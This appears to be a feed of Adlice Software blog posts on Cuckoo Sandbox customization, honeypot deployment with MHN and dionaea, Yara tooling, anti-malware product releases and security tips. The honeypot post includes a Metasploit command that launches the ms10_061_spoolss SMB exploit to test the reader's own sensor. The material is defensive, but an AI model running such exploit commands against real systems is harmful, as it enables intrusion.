from cuckoo.common.abstracts import Processing
from cuckoo.common.exceptions import CuckooProcessingError

class Custom(Processing):
    """Analysis custom information."""

    def run(self):
        """Run debug analysis.
        @return: debug information dict.
        """
        self.key = "custom"
        data = {}
        try:
          #initial
          custom_log = os.path.join(self.logs_path, "initial.json")
          with open(custom_log) as json_file:          
            data["initial"] = json.load(json_file)
        except Exception, e:
          raise CuckooProcessingError(str(e))

        try:
          #post
          custom_log = os.path.join(self.logs_path, "post.json")
          with open(custom_log) as json_file:          
            data["post"] = json.load(json_file)
        except Exception, e:
          raise CuckooProcessingError(str(e))

        return data

Reporting module

The reporting modules are located into $$CUCKOO/reporting.
They are executed on the host, to translate data from the global container into a different format. It could be a HTML page, json file, even a PDF or something else.

To enable a new reporting module, you need to add the section below into $$CWD/conf/reporting.conf.

[custom]
enabled = yes

You also need to add a field to the dictionary defined in $$CUCKOO/common/config.py.

"reporting": {
            "feedback": {
                "enabled": Boolean(False),
            },
            "jsondump": {
                "enabled": Boolean(True),
                "indent": Int(4),
                "calls": Boolean(True),
            },
            "custom": {
                "enabled": Boolean(True),
            },
            ...
},

And finally add your module into $$CUCKOO/reporting.

import os
import json
import codecs

from cuckoo.common.abstracts import Report
from cuckoo.common.exceptions import CuckooReportError

class Custom(Report):
    """Saves custom results in JSON format."""   
    def run(self, results):
        """Writes report.
        @param results: Cuckoo results dict.
        @raise CuckooReportError: if fails to write report.
        """

        try:
            path = os.path.join(self.reports_path, "custom.json")

            with codecs.open(path, "w", "utf-8") as report:
                json.dump(results["custom"], report, sort_keys=False, indent=4)
        except (UnicodeError, TypeError, IOError) as e:
            raise CuckooReportError("Failed to generate JSON report: %s" % e)

Add new section to HTML report

If you use the web server, it may be useful to get the information displayed for your new module. This can be achieved by defining new templates and adding routes.

First create your template into $$CUCKOO/web/templates/analysis/pages/custom/index.html. This is the file that you will need to modify for your needs.

{% extends "base.html" %}
{% load staticfiles %}
{% load analysis_tags %}
{% block content %}
    
    <div class="flex-nav">
        {% include "analysis/pages/nav-sidebar.html" %}
        <section class="flex-nav__body cuckoo-analysis" tabindex="0">

            <header class="page-header cuckoo-analysis__header">
                <h2><i class="fa fa-eye"></i> My Custom Data</h2>
            </header>

            <div class="container-fluid">
                <div class="row">
                    <div class="col-md-12">
                        <div class="tabbable tabs">
                            <pre>{{report.analysis.custom}}</pre>
                        </div> 
                    </div>
                </div>
            </div>

            <!-- footer replacement to avoid double scrollbars -->
            <footer class="flex-grid__footer center-left">
                <p class="footnote">
                    &copy;2010-2017 <a href="http://www.cuckoosandbox.org" target="_blank">Cuckoo Sandbox</a>
                </p>
                <div class="logo">
                    <img src="{% static "graphic/cuckoo_inverse.png" %}" alt="Cuckoo Malware Analysis Sandbox" />
                    <a href="#">Back to Top</a>
                </div>
            </footer>
            
        </section>
    </div>

{% endblock %}

Then you need to update the sidebars to add your section to the navigation. The 2 files to be modified are the following, and are quite similar:

$$CUCKOO/web/templates/analysis/pages/sidebar.html
$$CUCKOO/web/templates/analysis/pages/nav-sidebar.html

{% if report.analysis.custom %}
<li>
	<a href="{% url "analysis" report.analysis.info.id "custom" %}"
	{% if env.view_kwargs.page == 'custom' %} class="active" {% endif %}>
		<i class="fa fa-eye"></i> 
		<span>My Custom Data</span>
	</a>
</li>
{% endif %}

...

{% if report.analysis.custom %}
<li>
	<a href="{% url "analysis" report.analysis.info.id "custom" %}">
		<i class="glyphicon glyphicon-eye"></i>My Custom Data
	</a>
</li>
{% endif %}

To finish, you need to add the route for your section in $$CUCKOO/web/controllers/analysis/routes.py:

pages = {
	"summary": "summary/index",
	"static": "static/index",
	"behavior": "behavior/index",
	"network": "network/index",
	"custom": "custom/index",
	...
}

Concrete use case: Removal report

The idea is to get a removal report for a malware with a given anti-malware scanner, RogueKiller.
To do so, we will use a new auxiliary module, for which we will write a finish routine that runs and injects our antimalware:

#!/usr/bin/env python
import logging
import os
import shlex
import json
import logging
import urllib2
import tempfile

from common.abstracts import Auxiliary
from common.results import NetlogFile
from common.results import upload_to_host
from api.process import Process
from common.defines import KERNEL32

log = logging.getLogger(__name__)

class RogueKiller(Auxiliary):
    """Gather custom data"""

    def __init__(self, options={}, analyzer=None):
        Auxiliary.__init__(self, options, analyzer)
        
    def start(self):
        pass

    def finish(self):        
        # removal scanner
        log.info("RogueKiller: Starting removal")
        try: 
          #download
          response = urllib2.urlopen("http://link_to_roguekillercmd.exe")
          f = tempfile.NamedTemporaryFile(delete=False)           
          data = response.read()   
          f.write(data)
           
          #rename
          path = f.name + ".exe"          
          f.close()
          os.rename(f.name, path)
          log.info("Downloaded remover program to %s", path)        
          

          #execute (without injection, too many problems)
          args = "-scan \"-pupismalware -pumismalware -autodelete -portable-license C:\\rk_config.ini -reportpath C:\\rkcmd.log -reportformat txt\" -dont_ask"
          #pid  = self.execute(path, args=shlex.split(args))
          p = Process()
          
          # we need to lock the analyzer while we start and exclude our remover process
          self.analyzer.process_lock.acquire()
          
          if not p.execute(path=path, args=shlex.split(args), free=True):
            raise CuckooPackageError("Unable to execute the initial process, ""analysis aborted.")
          pid = p.pid  
          
          # add to monitored list, so that it will never tried to be injected
          self.analyzer.process_list.add_pid(pid)
          
          # unlock
          self.analyzer.process_lock.release()
          
          log.info("Executing remover program with args: %s", args)

          #wait for end
          while Process(pid=pid).is_alive():
              KERNEL32.Sleep(1000)
          
          #get report
          upload_to_host("C:\\rkcmd.log", "logs/removal.log")
          log.info("Executed remover program with args: %s", args)

        except Exception, e:
          log.exception("Error while loading the remover program")

After the analysis is done, finish() is called. In this method we download in a temporary file our anti-malware (in CLI version), then we run it outside of cuckoo injection, to be faster and not put junk into the report.

Once the report is generated we upload it back to the host to attach it to our analysis. Then the cuckoo report is generated and we can compare what the malware did, and what the anti-malware was able to catch and remove. Simple as that!

In our example below, the malware was a fake putty binary, notice the RogueKillerCMD scanner running.

Image may be NSFW.
Clik here to view.

We then define a processing module, that will put the generated data into the global container:

import os
import json
import io

from cuckoo.common.abstracts import Processing
from cuckoo.common.exceptions import CuckooProcessingError

class RogueKiller(Processing):
    """Analysis custom information."""

    def run(self):
        """Run debug analysis.
        @return: debug information dict.
        """
        self.key = "roguekiller"
        try:
          custom_log = os.path.join(self.logs_path, "removal.log")
          with io.open(custom_log, 'r', encoding='utf-16-le') as report_file:          
            #data = json.load(report_file)
            data = report_file.read()
        except Exception, e:
          raise CuckooProcessingError(str(e))

        return data

To finish, we have added our section in the HTML templates (as described above). This is the result:

Image may be NSFW.
Clik here to view.

Links

The post Cuckoo Sandbox Customization (V2) appeared first on Adlice Software.

↧

Catch malware with your own Honeypot (V2)

May 24, 2017, 8:40 am

≫ Next: Download YaraEditor (Web)

≪ Previous: Cuckoo Sandbox Customization (V2)

Whether your are a security researcher or a sysadmin, you need a honeypot for various reasons:

If you are a security researcher it’s because honeypots are very valuable source of malware and exploits, they also give hints about where the threats come from, and how big they are.

If you are a sysadmin it’s because honeypots will be the first machines to be hit in your network, they can raise the red flag in case of an intrusion.

This is a reissue of the previous post, because we found a much easier and better solution, this is why this post is labelled “V2”.

Definition

What is a honeypot?

A honeypot is a machine configured to be (or at least, appear to be) vulnerable to exploits and/or password bruteforcing. Such machine needs to be fully exposed to the world, so that it can catch as many attacks as possible.

Other than that, the machine needs some mechanisms to automatically alert administrator in case of an intrusion.

MHN (Modern Honeypot Network)

I will present you an all-included solution called MHN (official page: https://github.com/threatstream/mhn), easy to deploy with few configuration.

MHN is made of at least 2 components: UI and a sensor, and it’s preferable for security to deploy those on 2 different servers.

Sensors are individual honeypots with a unique goal. They are based on other projects, deployed and linked to the UI very easily.

We will study the particular case of dionaea (link: https://github.com/DinoTools/dionaea), which handles many attacks like HTTP, HTTPS, MYSQL, FTP, SMB, …

MHN User Interface (Server 1)

To deploy user interface on the first machine, do the following (Ubuntu 14.04 tested):

$ cd /opt/
$ sudo apt-get install git -y
$ sudo git clone https://github.com/threatstream/mhn.git
$ cd mhn/
$ sudo ./install.sh

During install, some configuration will be requested:

===========================================================
MHN Configuration
===========================================================
Do you wish to run in Debug mode?: y/n n
Superuser email: YOUR_EMAIL@YOURSITE.COM
Superuser password: 
Server base url ["http://"]: 
Honeymap url ["http://:3000"]:
Mail server address ["localhost"]: 
Mail server port [25]: 
Use TLS for email?: y/n n
Use SSL for email?: y/n n
Mail server username [""]: 
Mail server password [""]: 
Mail default sender [""]: 
Path for log file ["mhn.log"]:

Once installed, the panel should be available on http://ip_of_your_ui_server.
Login with “Superuser” credentials.

Image may be NSFW.
Clik here to view.

Deploy dionaea Honeypot (Server 1)

Once logged into the UI, you will notice that everything is empty.
We first need the deploy a sensor and connect it back to MHN.

To do so, navigate to “Sensors”, “Add sensor”.
Then fill the form with honeypot name, hostname and purpose (Ex: dionaea-1, my_server_host_name, dionaea) and validate. It’s important to note the given UUID somewhere, it will be needed later.

Next, on the MHN machine (server 1) we will need to register the UUID manually: myuuid is the UUID given above, mysecret is a password that you choose.

IDENT=myuuid
SECRET=mysecret
PUBLISH_CHANNELS="dionaea.capture,dionaea.connections"
SUBSCRIBE_CHANNELS=""

cd /opt/hpfeeds/broker
python add_user.py "$IDENT" "$SECRET" "$PUBLISH_CHANNELS" "$SUBSCRIBE_CHANNELS"

Deploy dionaea Honeypot (Server 2)

First install dionaea on your server as documented here: https://dionaea.readthedocs.io/en/latest/
Then install python requests (optional, if you need to upload the dropped files automatically):

sudo apt-get install python3-requests

Edit dionaea configuration (optional): /opt/dionaea/etc/dionaea/dionaea.cfg
Edit hpfeeds configuration : /opt/dionaea/etc/dionaea/iHandlers-available/hpfeeds.yaml

- name: hpfeeds
  config:
    server: "mhnserver.com"
    port: 10000
    ident: "myuuid"
    secret: "mysecret"
    # dynip_resolve: enable to lookup the sensor ip through a webservice
    dynip_resolve: "https://api.ipify.org/?format=txt"

Create symbolic link to add hpfeeds handler:

ln -s /opt/dionaea/etc/dionaea/iHandlers-enabled/hpfeeds.yaml /opt/dionaea/etc/dionaea/iHandlers-available/hpfeeds.yaml

(Optional) If you need to get the dropped files uploaded to your hosting server, just drop your upload python script (not covered here) into /opt/dionaea/lib/dionaea/python/dionaea/my_upload.py.

Then modify storage script: /opt/dionaea/lib/dionaea/python/dionaea/store.py

from dionaea.my_upload import UploadFile
[...]
def handle_incident(self, icd):
        [...]
        try:
            os.stat(n)
            i = incident("dionaea.download.complete.again")
            logger.debug("file %s already existed" % md5)
        except OSError:
            logger.debug("saving new file %s to %s" % (md5, n))
            os.link(p, n)
            i = incident("dionaea.download.complete.unique")

            #=============================================
            # Uploading unique file
            UploadFile(n)
            #=============================================

        i.file = n
        [...]

Restart dionaea:

sudo service dionaea restart

Once installed, you should see a new sensor in the list:

Image may be NSFW.
Clik here to view.

You’re all set! If your sensor IP is well known, you should start to get connexions from bots.
They are logged as ‘attacks’, but they are most of the time only port scan.

Test Honeypot

We can make sure everything is well configured with a manual test with little help of metasploit.
If you have a machine with metasploit installed (not covered here), you can execute the following command:

msfconsole -x "use exploit/windows/smb/ms10_061_spoolss; set PNAME XPSPrinter; set RHOST ; set LHOST ; set LPORT 4444; exploit; exit"

It should be able to send a payload on the sensor machine:

Image may be NSFW.
Clik here to view.

And the sensor should be able to log the activity:

Image may be NSFW.
Clik here to view.

Also, the sensor should have captured the payload:

Image may be NSFW.
Clik here to view.

The payload has also been sent automatically to our malware repository (The repository is built with MRF, in case you want to know):

Image may be NSFW.
Clik here to view.

That’s it, now you should be able to catch in-the-wild threats.
You can take a look at other built-in sensors, they worth it!

After a few days:

After a few days, this is what it looks like:

Image may be NSFW.
Clik here to view.

The map shows real time attacks (no history is kept), and is quite interesting:

Image may be NSFW.
Clik here to view.

Links

– https://github.com/threatstream/mhn
– https://github.com/DinoTools/dionaea
– http://www.metasploit.com/

The post Catch malware with your own Honeypot (V2) appeared first on Adlice Software.

↧

Download YaraEditor (Web)

August 10, 2017, 4:20 am

≫ Next: Download Adlice Diag

≪ Previous: Catch malware with your own Honeypot (V2)

Image may be NSFW.
Clik here to view.

Yara has become a pretty popular standard in the Anti-malware industry to write signatures for malware detections. Many Anti-malware vendors, sandboxes vendors, HIPS vendors, CERTs or IT administrators are using rules to either detect malware based on the file, or to analyze network packets and trigger an alert when something malicious occurs.

Yara is a signature syntax and scanning engine, it’s available with a library or a bunch of scripts. We, at Adlice Software, are specialized in making Yara easy and convenient to use. After a desktop application, we are now offering a full website framework to write, organize and test your rules directly from your browser.

YaraEditor is an OPEN SOURCE framework built to make your life easier in writing your rules (editor with syntax highlight), testing them (against files, strings, buffers) and sharing them. It was also built with the team collaboration in mind, with ability to leave comments on rules, have a validation workflow (soon) and publishing via API.

DEMO

We have released our own yara sharing platform. So if you want to test the framework, this is the best place to go for a live demo.

FEATURES

Self-hosted solution (PHP/Mysql server needed)
Can run on Synology NAS (with Web Station)
REST API (submit, delete, update, get), with API Key
Authentication with modified UserCake library
Users Rights management
Easy to customize, with only one config file to change
Files management (creation/edition/removal)
Files exports
Rules management (creation/edition/removal)
Rules viewer
Rules export
Rules import
Give a name on rules/files copy
Stats page
Search page (with magic field)
Permissions (contributor, publisher, …)
History page
Recycle Bin
Syntax check (with yara pythong)
Rule test (with yara pythong)
Tests page (string -ANSI/UNICODE-, Hex strings, Files -local storage-)
User comments (with conversations)

ROADMAP

Publication workflow (draft, valid, published, …)
Plugin: Aliases
MRF integration (test rules on files stored in MRF)

DOCUMENTATION

General Documentation.

The post Download YaraEditor (Web) appeared first on Adlice Software.

↧

Download Adlice Diag

June 6, 2018, 8:07 am

≫ Next: Introducing Adlice Diag (Anti-malware Diagnostic)

≪ Previous: Download YaraEditor (Web)

Image may be NSFW.
Clik here to view.

Adlice Diag is a FREE software to help anyone diagnose problems and infections on their machine.

Based on RogueKiller’s scan engine, Diag features powerful generic detections (heuristics), and more classic anti-malware analysis (signature finding), from one of the best malware removal software. It is able to find threats other anti-malware can’t find because of the very aggressive and deep scanner (with Anti-Rootkit module).

Adlice Diag is a hybrid diagnostic tool, with embedded Anti-malware engine. Scans are blazing fast (less than 15 mns), yet extremely powerful. One can select items to be scanned from the internal scan rules (more than 50 elements).

The scanner lists everything found on the machine (not only the infected ones), giving the ability to remove even the undetected items. The colored syntax makes results very clear and easy to understand for the novice or the expert.

Diag is maintained by a small team. We also react very quickly to integrate new detections and bug fixes. Diag is compatible with Windows XP, Vista, 7, 8, 8.1, 10. Fully compatible 32/64 bits.

DOCUMENTATION

Please refer to the general documentation.

VIDEO TUTORIAL

DOWNLOAD

It’s recommended to use the installable version (Installer), especially if you are a Premium user because it’s needed for automatic updates.

The portable version means it will not be installed on the machine, therefore you can just copy and execute it without leaving a trace.

The post Download Adlice Diag appeared first on Adlice Software.

↧

Introducing Adlice Diag (Anti-malware Diagnostic)

June 7, 2018, 8:34 am

≫ Next: Introducing RogueKiller V13

≪ Previous: Download Adlice Diag

We are proud to announce that our new project, that we’ve been working on hardly for the past year, has been released ! It is called Adlice Diag, and it will be your favorite software when it comes to diagnose a machine’s health…

What is Adlice Diag?

Adlice Diag is a hybrid diagnostic software, with builtin Anti-malware engine. Wow.
Imagine a software like FRST (or OTL, HijackThis, etc…) with a UI in the style of Autoruns (from Microsoft), and a Anti-malware classification layer coming from RogueKiller engine.

Add some real-time monitoring features (like Process Explorer), a Software Updates check (like UCheck), and the ability to share your analysis reports with anyone with permalinks. If you can imagine, this is Adlice Diag.

Image may be NSFW.
Clik here to view.

What’s the purpose of it? Why is it so different?

We built this software so that anyone can get easy help from whoever is willing to help (forum, tech support). We also thought about self-taught people who need a cool software to diagnose their own machines.

Scans are running blazing fast, in less than 15 mns for all the machines. Average machine runs the scan in 5 mns. When running a scan, you can cherry-pick the scan rules from more than 50 rules available. This let’s you scan only what you need to scan.

Image may be NSFW.
Clik here to view.

Scan results are displayed into categories (processes, services) and most of the time in a parent-child tree organization. Results are also classified according to their criticality (Anti-malware layer). Since it’s a diagnostic software, even safe and undetected items are shown, that’s the goal. That way, if our engine misses something, one will still be able to remove it.

Image may be NSFW.
Clik here to view.

Sounds Awesome, can I try it?

Yes. We have a BETA program going on, so please feel free to download the soft and try it.

The software looks unfinished. What’s next ?

Yes. We release the BETA version now because we are confident about the malware removal feature, and this is the first thing we want to stabilize. Now, we are working on the server-side version, to improve the report page and give you access to a full featured removal workflow exchange.

Server-side

In the future, when getting some help on the forums, the OP (requester) will be able to share his report with the helper in a secured way (permalink and unique access to a designated person). The helper will then create a removal script on the web ui (by only checking items), and once validated, the OP will get a notification of a removal script ready to be applied.

After application, the machine is cleaned. No longer copy/pasting long reports on the forums. No longer exploding helpers’ eyes on reading those reports in a badly formatted way. No longer waiting for notifications from various forums, everything is in 1 place with email alerts and notifications, and ordered by date and status.

Real-time

Real-time (or System) tab will come very soon. You will be able to explore running processes (and kill them), running services, network activity and such.

UCheck

When it comes to security, Software updates are really primordial. We are in the process of migrating the UCheck code into the RogueKiller engine (SDK). This means its features will be accessible from any other software of our galaxy, and especially Diag. We will add a basic version of UCheck engine into Diag, which will let you know if some updates are needed.

Is it FREE ? Where can I buy ?

Adlice Diag is FREE to use for anyone as long as we are in the beta program (0.X.X version). The cart button is going to a missing page for now, because later the Premium licenses will be available on that page.

In the future, the software will be FREE for personal use, including malware removal on the forums. Everything business related will need to purchase a license. The price is unknown yet, but it should be around the same price as for RogueKiller (20$/year).

During the BETA program, all features are unblocked, and there’s no nag screen.

Conclusion

If you missed the download link for Adlice Diag, it’s here.
If you have any feedback, as usual please contact the support.

The post Introducing Adlice Diag (Anti-malware Diagnostic) appeared first on Adlice Software.

↧

Introducing RogueKiller V13

October 16, 2018, 12:17 am

≫ Next: How to Avoid Being Hacked: The Ultimate Guide

≪ Previous: Introducing Adlice Diag (Anti-malware Diagnostic)

We are proud to announce that RogueKiller V13, that we’ve been working on hardly for the past year, has been released for public beta !

What’s new in RogueKiller Anti-Malware?

Almost everything is new. We’ve redone the user interface for a cleaner experience.
We have also fully redone the scanning engine for better performances. Here’s a list of the major changes:

Rewritten: User interface
Rewritten: Scan engine (core)
New: Quick scan (fast scan in less than 1 minute)
New: Command scanner (detects legit files used for malicious purpose -doesn’t remove legit-)
New: PDB scanner
New: Digisig scanner
Enhancement: Better scan results visualization
Enhancement: Scan engine much faster (multi-threading, code optimizations and fingerprinting)
Enhancement: Better cleanup on uninstall (license, settings and driver)
Simplification: Moved tools and expert mode to Adlice Diag
Fixes: multiple bugs and performance issues

Image may be NSFW.
Clik here to view.

RogueKiller V13 in Action

When launching the new RogueKiller version, you can choose between the quick scan and the standard scan (custom scan is not available yet).

Image may be NSFW.
Clik here to view.

At the end of the scan, results are displayed in a new widget with more information, and clickable threat links (that open a description page on our website).

Image may be NSFW.
Clik here to view.

Sounds Awesome, can I try it?

Yes. We have a public BETA program going on, so please feel free to download the soft and try it.

What’s next ?

After we fix all issues found during the public beta program, the software will be released and will replace RogueKiller V12. Then we will concentrate on the version 13.1 that will add more awesome features:

Online signatures (no need for weekly releases anymore)
Custom scan
Exclusions

What about my license? Will it continue to work?

Yes. All our licenses are working no matter the version, they only care about the purchased period.
If you bought RogueKiller V12 for 1 year, it will continue to work up to 365 days after the purchase, even with V13.

Conclusion

If you missed the download link for RogueKiller V13, it’s here.
If you have any feedback, as usual please contact the support.

The post Introducing RogueKiller V13 appeared first on Adlice Software.

↧

How to Avoid Being Hacked: The Ultimate Guide

October 30, 2019, 3:23 am

≫ Next: MRF: Introducing Sample Page

≪ Previous: Introducing RogueKiller V13

INTRODUCTION

With the development of broadband Internet connections, online/cloud-based services have become more and more numerous. Your data is not only located on your computer anymore but on a multitude of online servers. Not only you now should consider what could happen if your computer gets infected, but you must also consider what could happen if one of your online accounts gets compromised.

POSSIBLE ISSUES

Data Theft. Your computer is infected by some malware or an online service is compromised, and the attacker stole private files that you REALLY do not want to be exposed online.

Identity Theft. After an attacker has obtained specific data, they are able to impersonate yourself and use this for nefarious purposes.

Data Loss. Some malware authors specialize in creating malware that are designed to encrypt the files on your computer and ask for a ransom to recover them. Data loss is not only linked to malicious activities, losing your laptop or catastrophic hard disk failures are also common causes.

All of the issues described above can be avoided most of the times with good practices. You can prevent your computer from being infected, and you can limit the damages if an online account is compromised. Let’s have a look how.

AVOID BEING INFECTED

UPDATE YOUR SOFTWARE

Software vulnerabilities can be used to install malware on your machine. Using only maintained software where such vulnerabilities are fixed is recommended against infection propagation. Also, making regular operating system and software updates is a strong advice to stay away from possible exploitations.

We recommend to download and install UCheck, and make regular scans and updates. If you are a Premium user, this is even easier if you enable the Automatic Software updates.

BLOCK (DANGEROUS) ADS

Many websites display advertisements, of multiple types: There is classic (non-intrusive) ads, the annoying ads (displaying pop-ups, misleading buttons and such) and the malicious ads. The later are (obviously) the most dangerous, they can scare the user with fake error messages or even download and install malware without any interaction (drive by download). If you block ads, you close another door.

Installing an ad blocker will prevent this kind of attack. We recommend uBlock Origin because of its effectiveness, low memory footprint, wide support and compatibility. Site note: please be responsible and deactivate the extension on websites you want to support.

INSTALL AN ANTIVIRUS + ANTIMALWARE

The antivirus is the first barrier of protection against malware when they have reached your computer, so it is important to install an effective one. If you are using Windows 10, Windows Defender Antivirus is our recommended one. If you are using an older version of Windows, Avira Free Antivirus or Kaspersky Security Cloud Free will be your choice. On Windows XP, Panda Dome Free Antivirus is the product you should use (with considering an upgrade…)

A second layer of protection is one based on heuristics (next-gen anti-malware) and is mostly used to prevent against unknown threat. Our flagship product RogueKiller Premium (starting at version 14) does quite the job and includes both malware protection and documents protection (to avoid your files being held for ransom).

NEVER OPEN ATTACHEMENTS FROM UNKNOWN SENDERS

Spam campaigns are still an important way to infect machines, usually under the form of Office documents containing malicious macros. If your antivirus does not detect malicious code in the attachment, that doesn’t mean it’s not malicious. As a rule of thumb, if you do not know the sender, do not click on any link contained in the email body or open attached files.

Another important rule is to never ever blindly trust what the received emails are saying. Most spam campaigns rely on social engineering using blackmail, bait or any technique to make people click on a link or open a file. The content may be scary, promising, or questionable. This is made on purpose, just move them to the junk folder.

AVOID USING ACTIVATORS / CRACKS / KEYGENS

Software activators, or cracks/keygens are small pieces of software that promise you the use of a paid software for free. Generally speaking, 10% of them are working properly, 40% are buggy (but harmless) and 50% of them are pieces of malware, waiting to be executed.

Most of them also ask to turn off the Antivirus, so if you choose to activate a software with such a way it’s like playing “Russian Roulette”. Instead we recommend to either pay the software (look or ask directly for discounts), or use free alternatives (Linux, Open Office, …).

GOOD PRACTICES

NEVER USE THE SAME PASSWORD TWICE

Everytime you create a new account online, they ask you for an email and password. The password is most of the time encrypted on their end, but not always (due to poor practices).

If for some reason the service gets hacked, your email and password will be in the hands of hackers, who will try it on other services to hack all your accounts at once. This is why we recommend to never reuse a password. This is a hard advice, but we have solutions below so keep reading…

If you suspect an account is compromised, or just want to verify it’s not, you can search on haveibeenpwned with your email address.

USE A PASSWORD MANAGER

Remembering passwords is complicated, and impossible if you use 1 password per service (as recommended above). Fortunately there’s now services available on all devices (computer, smartphones, tablets…) that create and remember the passwords for you. They are even able to fill the forms for you, so that you don’t even need to copy or type it.

We don’t recommend storing passwords in the browser (like with Firefox), because it’s possible for hackers to steal the database files with all your passwords on your machine. Instead, we recommend cloud services like LastPass. You just need to remember one password (master password) to access and unlock your account, then your “vault” is accessible on all your devices.

USE 2FA WHEN POSSIBLE

2FA (for two-factor authentication) is a way to authenticate a user with something additional to its password. This additional verification is performed by using “something that only the user possesses”. Most of the time it’s a SMS received on a smartphone, or a token (hardware or software).

Some services provide a way to recognize 2FA authentification, which enforces the security of your account. If that’s the case we encourage you to enable it. Most popular (and stable) solutions for software token (unique codes randomly generated) are available for both Android and IPhone, Authy and Google Authenticator.

Important : Don’t forget to store your recovery codes when enabling the service.

GREEN PADLOCK DOES NOT EQUAL SAFE

One of the common myths of Internet security is concerning the padlock displayed by the browser when visiting a website: if the padlock is closed and highlighted in green colour, the site is safe. In reality, the site MIGHT be safe, but it’s not always the case.

Malware author are using this myth to trick the users into trusting them. A green padlock means that the data transmitted between the computer and the website is encrypted, that’s it. The examples below are from a malicious website that tries to impersonate sophos.com.

BACKUP EARLY, BACKUP OFTEN

Backups are your safety wheel in case of trouble. They won’t help you not to crash, but they’ll definitely help you to recover. There’s 3 rules to follow with backups:

Backup early (as soon as you have valuable data to save)
Backup often (every day / week, depending on the amount and changes)
Test your backups (verify they are properly saved and recoverable)

Nowadays there’s quite a few ways to backup your data: locally (with external drives or NAS) or by using a cloud service (Google Drive, Dropbox). Unfortunately, setting up one of these is not enough.

Whatever method you choose will still be vulnerable to hardware failure or unwanted data encryption (ransomware). If your NAS is available on the network a Ransomware will find it, same for a cloud account. An external drive can be stolen, burnt, or anything you can imagine.

A recommended way is to have at least 3 different backups (of the same data), in different locations:

The first copy is stored on your local hard drive or on a NAS (working copy)
The second copy is stored on a cloud storage service (online copy)
The third copy is stored on an external hard drive, not connected to the network (offline copy)

We recommend Synology NAS and cloud services like Google Drive or Dropbox.

The post How to Avoid Being Hacked: The Ultimate Guide appeared first on Adlice Software.

↧

MRF: Introducing Sample Page

October 20, 2016, 8:39 am

≫ Next: Fileless Malware using Powershell: Analysis & Removal

≪ Previous: How to Avoid Being Hacked: The Ultimate Guide

This new release (V4.2) is bringing a whole lot of new features and bugfixes, including a Sample page, a comments editor and users permissions.

Changelog

## Version 4.2
Sample page  
Using new modular installer  
Changed favorite filter for a checkbox  
Added user rights management  
Now comments have a WISIWIG editor  
Added tooltip for bulk selection and favorite  
Added Github project link in the sidebar  
Added URLs description name  
Fixed Signout redirection issue  
Fixed bug when menu wasn't showing because of too few samples  
Fixed overwritting of existing sample  
Fixed menu not showing on IE/Chrome  
Fixed page scrolling on Editing/Save  
Fixed URLs search  
Fixed Comment/URLs refresh when re-opening modal editors

User permissions

Sample Page

MRF V4.2 is RELEASED. Check it out, and give it a try!

Fileless Malware using Powershell: Analysis & Removal

October 21, 2016, 7:48 am

≫ Next: RogueKiller becomes Adlice Protect !

≪ Previous: MRF: Introducing Sample Page

Fileless malware has always been popular and widely covered (Example: Poweliks), because it really changes the classic Antimalware concept of scanning disks for malware. Fileless malware used to hide in the registry in the past, but today we will study a new (at least for us) technique to do so, by using a scheduled task.

Potentially Unwanted

Scheduled Task

The task used to store the malware is looking like the following picture. It’s using Powershell to start a VB script encoded in base64 with help of the -EncodedCommand switch.

Payload

Detection and Removal

RogueKiller (as of version 12.7.4) is able to parse the task parameters, extract and decode the payload, as well as classify the task as malicious and remove it.

RogueKiller becomes Adlice Protect !

December 19, 2024, 5:17 am

≪ Previous: Fileless Malware using Powershell: Analysis & Removal

RogueKiller, our in-house Anti-malware scanner and protection, has been around for more than 15 years. Today, we have decided to rebrand for a more “explicit” brand name, ADLICE PROTECT, and to add new major features. Take the tour.

Why changing the name ?

We have had this idea for a long time. RogueKiller name is very popular, and well known in the industry, so it was a tough decision.

The reason behind is to better align the brand with what it does, protecting (from malicious software). RogueKiller also had a negative wording, “killer”, whereas “protecting” sounds more like a positive thing. Adding “Adlice” in front of it also makes it easier to identify our company. So here it is, Adlice Protect !

Please note that nothing changes in terms of licensing, billing, etc… RogueKiller was already the propery of Adlice Software, so is Adlice Protect. Your existing invoices, subscriptions, and licenses remain valid, and the same. Forever.

What’s new in Adlice Protect ?

Many things. We have redesigned the core engine to better integrate in the operating system, improved the themes, fixed a lot of issues.

Self-Protection: Now Adlice Protect is able to guard itself against being killed or turned off by malicious programs.
Service Scan: RogueKiller was doing the scans from the UI. Now with Adlice Protect the scans are done inside the service. Results ? Scan is more powerful, and a lot faster.
Network drives: Because of the service scan, Adlice Protect is now able to scan network drives, shared drives, thumb drives, directly from the Custom scan.
Revamped themes and icons: Visually more appealing and user friendly.
A lot of bug fixes.

How do I test it ?

We have opened a bug tracker on Github, click here. The link to download the installer (BETA) is available on this page.

You just need to launch the installer, it will replace existing RogueKiller installation. If you find any issues, please feel free to contact us, or to open an issue on the bug tracker.

The post RogueKiller becomes Adlice Protect ! appeared first on Adlice Software.

↧